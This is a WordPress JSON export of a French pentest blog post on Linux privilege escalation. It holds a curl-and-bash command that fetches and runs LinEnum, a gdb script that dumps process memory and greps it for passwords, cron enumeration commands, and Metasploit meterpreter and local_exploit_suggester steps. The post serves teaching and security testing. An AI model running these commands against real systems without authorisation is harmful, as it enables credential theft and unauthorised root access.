Voir l’information qui peut nous permettre d’escalader nos privil\u00e8ges vers un shell administrateur<\/p>\n
# curl -o \/LinEnum https:\/\/raw.githubusercontent.com\/rebootuser\/LinEnum\/master\/LinEnum.sh\n# bash .\/linEnum -r \/tmp\/report<\/code><\/pre><\/p>\nV\u00e9rifier les protections utilis\u00e9s
\nhttps:\/\/raw.githubusercontent.com\/germainm\/check_linux_defenses\/main\/enumerate_linux_defenses.sh<\/a><\/p>\nExtraire la m\u00e9moire d’un processus \u00e0 la recherche de mots de passe
\n
\n\n#!\/bin\/bash\n#.\/dump-memory.sh <PID>\ngrep rw-p \/proc\/$1\/maps \\\n | sed -n 's\/^\\([0-9a-f]*\\)-\\([0-9a-f]*\\) .*$\/\\1 \\2\/p' \\\n | while read start stop; do \\\n gdb --batch --pid $1 -ex \\\n "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \\\ndone\n\n.\/dump-memory.sh <PID>\nstrings *.dump | grep -i password\n<\/code><\/pre><\/p>\nmimipenguin<\/a> peut retourver les mots de passe ( GDM password, Gnome Keyring, LightDM, VSFTPd, Apache2, OpenSSH )<\/p>\nV\u00e9rifier si les t\u00e2ches sch\u00e9dul\u00e9es sont vuln\u00e9rables. Vous pouvez peut-\u00eatre exploiter un script ex\u00e9cut\u00e9 en tant qu’administrateurs (vuln\u00e9rabilit\u00e9 wildcard (*), possibilit\u00e9 de cr\u00e9er des fichiers que le script pourrait utiliser, liens symboliques)
\n
crontab -l\nls -al \/etc\/cron* \/etc\/at*\ncat \/etc\/cron* \/etc\/at* \/etc\/anacrontab \/var\/spool\/cron\/crontabs\/root 2>\/dev\/null | grep -v "^#"<\/code><\/pre><\/p>\nD’autres outils comme lynis ou LinPEAS peuvent \u00eatre utilis\u00e9s<\/p>\n
Voir aussi https:\/\/gtfobins.github.io<\/a> et https:\/\/lolbas-project.github.io\/<\/a> pour des id\u00e9es d’utilitaires qui peuvent \u00eatre utilis\u00e9s pour avoir plus d’acc\u00e8s qu’initialement pr\u00e9vu.<\/p>\nPour trouver des exploits avec metasploit, il faut d’abord upgrader la session en meterpreter. Pour se faire, nous mettons la session en background avec ctrl+z. Avec “sessions”, nous obtenons l’identifiant associ\u00e9 \u00e0 la session. Par la suite, sessions -u id.Une nouvelle session sera cr\u00e9e. Par la suite, nous pouvons faire \u00e0 nouveau un listing des sessions avec “sessions”. Par la suite, nous pouvons utiliser le module local_exploit_suggeste et r\u00e9gler le param\u00e8tre session avant de faire la recherche d’exploits.<\/p>\n
use post\/multi\/recon\/local_exploit_suggester\nset session 2\nrun\n<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"Voir l’information qui peut nous permettre d’escalader nos privil\u00e8ges vers un shell administrateur # curl -o \/LinEnum https:\/\/raw.githubusercontent.com\/rebootuser\/LinEnum\/master\/LinEnum.sh # bash .\/linEnum -r \/tmp\/report V\u00e9rifier les protections utilis\u00e9s https:\/\/raw.githubusercontent.com\/germainm\/check_linux_defenses\/main\/enumerate_linux_defenses.sh Extraire la m\u00e9moire d’un processus \u00e0 la recherche de mots de passe #!\/bin\/bash #.\/dump-memory.sh <PID> grep rw-p \/proc\/$1\/maps \\ | sed -n 's\/^\\(*\\)-\\(*\\) .*$\/\\1 \\2\/p' \\ | while read start stop; do \\ gdb –batch –pid $1 -ex \\ "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \\ done .\/dump-memory.sh <PID> strings *.dump | grep -i password mimipenguin peut retourver les mots de passe ( GDM password, Gnome Keyring, LightDM, VSFTPd, Apache2, OpenSSH ) V\u00e9rifier <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15],"tags":[],"yoast_head":"\n
Escalade de privil\u00e8ges avec Linux - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Escalade de privil\u00e8ges avec Linux - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Voir l’information qui peut nous permettre d’escalader nos privil\u00e8ges vers un shell administrateur # curl -o \/LinEnum https:\/\/raw.githubusercontent.com\/rebootuser\/LinEnum\/master\/LinEnum.sh # bash .\/linEnum -r \/tmp\/report V\u00e9rifier les protections utilis\u00e9s https:\/\/raw.githubusercontent.com\/germainm\/check_linux_defenses\/main\/enumerate_linux_defenses.sh Extraire la m\u00e9moire d’un processus \u00e0 la recherche de mots de passe #!\/bin\/bash #.\/dump-memory.sh <PID> grep rw-p \/proc\/$1\/maps | sed -n 's\/^(*)-(*) .*$\/1 2\/p' | while read start stop; do gdb --batch --pid $1 -ex "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; done .\/dump-memory.sh <PID> strings *.dump | grep -i password mimipenguin peut retourver les mots de passe ( GDM password, Gnome Keyring, LightDM, VSFTPd, Apache2, OpenSSH ) V\u00e9rifier\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-05-23T16:47:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-05-30T12:02:22+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/\",\"name\":\"Escalade de privil\u00e8ges avec Linux - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-05-23T16:47:06+00:00\",\"dateModified\":\"2021-05-30T12:02:22+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Escalade de privil\u00e8ges avec Linux\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Escalade de privil\u00e8ges avec Linux - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/","og_locale":"fr_CA","og_type":"article","og_title":"Escalade de privil\u00e8ges avec Linux - S\u00e9curiser votre site","og_description":"Voir l’information qui peut nous permettre d’escalader nos privil\u00e8ges vers un shell administrateur # curl -o \/LinEnum https:\/\/raw.githubusercontent.com\/rebootuser\/LinEnum\/master\/LinEnum.sh # bash .\/linEnum -r \/tmp\/report V\u00e9rifier les protections utilis\u00e9s https:\/\/raw.githubusercontent.com\/germainm\/check_linux_defenses\/main\/enumerate_linux_defenses.sh Extraire la m\u00e9moire d’un processus \u00e0 la recherche de mots de passe #!\/bin\/bash #.\/dump-memory.sh <PID> grep rw-p \/proc\/$1\/maps | sed -n 's\/^(*)-(*) .*$\/1 2\/p' | while read start stop; do gdb --batch --pid $1 -ex "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; done .\/dump-memory.sh <PID> strings *.dump | grep -i password mimipenguin peut retourver les mots de passe ( GDM password, Gnome Keyring, LightDM, VSFTPd, Apache2, OpenSSH ) V\u00e9rifier","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-05-23T16:47:06+00:00","article_modified_time":"2021-05-30T12:02:22+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/","name":"Escalade de privil\u00e8ges avec Linux - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-05-23T16:47:06+00:00","dateModified":"2021-05-30T12:02:22+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-avec-linux\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Escalade de privil\u00e8ges avec Linux"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/117"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=117"}],"version-history":[{"count":8,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/117\/revisions"}],"predecessor-version":[{"id":321,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/117\/revisions\/321"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}